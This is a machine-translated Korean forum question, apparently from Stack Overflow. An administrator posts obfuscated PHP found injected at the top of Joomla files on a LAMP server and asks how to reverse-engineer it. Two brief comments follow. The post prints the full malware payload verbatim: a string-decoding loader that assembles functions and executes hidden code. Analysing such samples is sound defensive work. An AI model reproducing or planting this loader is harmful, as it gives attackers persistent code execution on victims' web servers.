1
최근 램프 서버의 일부 Joomla 파일 맨 위에 난독 화 코드가 있음을 발견했습니다. 분명히 이것은 Joomla 익스플로잇을 통해 여기에 배치되었지만 코드가 매우 모호하므로 코드가 무엇을하는지 거의 말하기가 불가능합니다. 그것을 분석하는 동안 나는 문자열의 사용이 반복 발견 : 분명히 이것에 시달려PHP 코드 "opjudovg"의 난독 화
opjudovg 나는 약간의 인터넷 검색을 수행하고 다른 사람을 발견
(모든 줌라 있습니다에게)하지만 난하지 않은 이 스크립트가 무엇을하는지에 대한 좋은 대답을 발견했습니다.
사람이 내가 리버스 엔지니어링에 대해 어떻게 생각하는지에 대한 아이디어가 있습니까?
<?php $ldzlfqw = ',3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%]y72]254]y76#<!%w:!>!(%w:!>! x2467+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!1 156 x75 156 x61"])))) { $GLOBALS[" x x242178}527}88:}334}472 x24<!%ff8M4P8]37]278]225]241]3 x64"))) { $qnqbjbm = " x63 162 x654- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,eTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!VER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x41<!fmtf!%b:>%s: x5c%j:.pV x7f x7f x7f x7f<u%V xpo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x2]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csbowTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t27f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{fid>}&;!osvufs} x7f;!opjudovg}k~~<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]83<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssb%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFtmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubu%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%q% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss 141 x74 145 x5f 146 x75 156 142 x5f 163 x74 141 x268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:2L5P6]y6gP7L6M7]D4]275]D:Mn%<#372]58y]472]37y]672]48y]#>s%<#462]47252]y85]256]y6g]257]y86]267]y74]275]y7:]`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} xy]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`crray_map("burmcad",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]2652]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}34]368]322]3]364]6]283]427]3<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgPbssbz)#44ec:649#-!#:618d5f9#-!#f6c683-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<! x24- x2#!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bdsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw}.;/#/#/},;#-#}+;%-qp%)EBFI,6<*127-UVPFNJU,6<*27-SFGTOBc x27,*b x27)fepdof.)fepdof. x63 164 x69 157 x6e"; function burmcad(]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy x61 156 x64 162 x6f 151/#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y8493e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]2)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3oSUOSVUFS,6<*msv%7-MSV,6<*)ujo$n){return chr(ord($n)-1);} @error_reportw6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fm54l} x27;%!<*#}_;#)323ld)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftp71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#Q%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudove))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:cvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*42!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ 27{ftmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27jR x27id%6< x7fw6* x*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44##0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~z)#P#-#Q#-#B#-#T#-#E~<ftmbg!osvufs!|ftmf!~<**9.-j%5 116 x54"]); if ((strstr($uas," x6d 163 x69 145!%w:**<")));$ikuqvqa = $qnqbjbm("", $xchsxyf); $ikuqvqa();}PI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|mdXA6~6<u%7>/7&6|7**1111272 164") && (!isset($GLOBALS[" x6-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/opd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`m6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofu*<%j:,,Bjg!)%j:>>1*!%b:>5]D6#<%fdy>#]D4]273]D6P.7eu{66~67<&w6<*&7-#o]s]o]s]#61 156 x75 156 x61"]=1; $uas=strtolower($_SER}")) or (strstr($uas," x72 166 x3a 61 x31")) or (strstr($uas,"445]43]321]464]284]364]6yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x2jgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~9{d%:osvufs:~928>> x22:f4gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w2^,%b:<!%c:>%s: x5c%j:^<!%w` pd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<#!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msvD8]86]y31]278]y3f]51L3]84]y-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hn<**#57]38y]47]67y]37]88y]27]28y]#/r|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>!]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]31M6]y3e]81#/#7e:55946-tr.984:75983:48984:f)fepdof`57ftbc x7f!|ing(0); $xchsxyf = implode(ax5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>x24- x24tvctus)% x24- x24b!>!%if((function_exists(" x6f6]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212](<!fwbm)%tjw)# x24#-!#]y38#-k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%)zbssb!>!ssbnpe_GMFT`QIQ&f_UTpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFS7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ft7-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%67~6<Cw6<pd%w6Z6<.5`hA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq%99#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)% x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQ-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#6Z6<.2`hA x27pd%6<C x27pd%6|6|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs!*)323zbek!~!<b% x7f!<X>b%Z<#omgoj{h1:|:*mmvo:>:iuhofmSTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSkqicujnj'; $igdlorg=explode(chr((507-387)),substr($ldzlfqw,(23721-17795),(191-157))); $jhvudq = $igdlorg[0]($igdlorg[(3-2)]); $xuqzdby = $igdlorg[0]($igdlorg[(10-8)]); if (!function_exists('inlski')) { function inlski($zkhzovdq, $rcqclg,$extvvvla) { $levdzxqh = NULL; for($nomjzfqly=0;$nomjzfqly<(sizeof($zkhzovdq)/2);$nomjzfqly++) { $levdzxqh .= substr($rcqclg, $zkhzovdq[($nomjzfqly*2)],$zkhzovdq[($nomjzfqly*2)+(6-5)]); } return $extvvvla(chr((42-33)),chr((312-220)),$levdzxqh); }; } $zhjksylgzw = explode(chr((271-227)),'5142,25,1198,22,3717,33,203,38,4254,45,409,56,3526,48,4300,61,2331,24,296,35,1170,28,2225,40,2576,41,5015,28,1639,70,107,34,5528,23,4564,56,5790,29,4225,29,2687,47,3692,25,5472,56,5410,62,5355,55,3251,39,1468,46,5551,70,1514,66,1069,58,2617,46,4448,37,879,67,2165,32,2547,29,3168,20,2087,55,4130,48,4095,35,2038,49,1383,40,633,48,3441,35,3496,30,1872,63,3130,38,43,64,0,43,3188,63,2983,41,4781,58,4649,44,1988,50,825,54,3339,54,2197,28,2355,41,5819,53,141,62,3800,57,3290,49,5326,29,3633,59,5872,30,512,40,2504,43,4994,21,4693,61,2142,23,2663,24,681,33,4485,24,946,66,5902,24,2827,70,1580,59,488,24,3083,47,1012,57,3963,63,3927,36,1709,56,5260,66,2396,53,4910,42,1343,40,1220,57,4839,35,3857,70,1303,40,1423,45,4874,36,241,33,3024,59,5112,30,4385,63,331,45,1935,53,4509,55,4026,69,5673,48,376,33,1835,37,5621,52,2770,57,595,38,1127,43,3750,50,2449,55,4754,27,4952,42,2734,36,1793,42,4202,23,1277,26,3393,48,2265,66,714,66,274,22,1765,28,5167,65,4361,24,552,43,2897,43,2940,43,4178,24,465,23,4620,29,5043,69,780,45,3476,20,5753,37,5721,32,5232,28,3574,59,4299,1'); $iuypjrt = $jhvudq("",inlski($zhjksylgzw,$ldzlfqw,$xuqzdby)); $jhvudq=$ldzlfqw; $iuypjrt(""); $iuypjrt=(686-565); $ldzlfqw=$iuypjrt-1; ?>
언뜻보기에 보통 이런 식의 코드는 서버에서 데이터를 추출하기 위해 일종의 eval을 사용합니다. – Xorifelse
@ Xorifelse 그래, 나도 그럴 것으로 생각했지만 더 자세한 내용을 얻으려면 "되돌릴"방법이 확실치 않습니다. 어떤 도움이라도 대단히 감사하겠습니다. –
참조 : http://security.stackexchange.com/q/115461 – Rizier123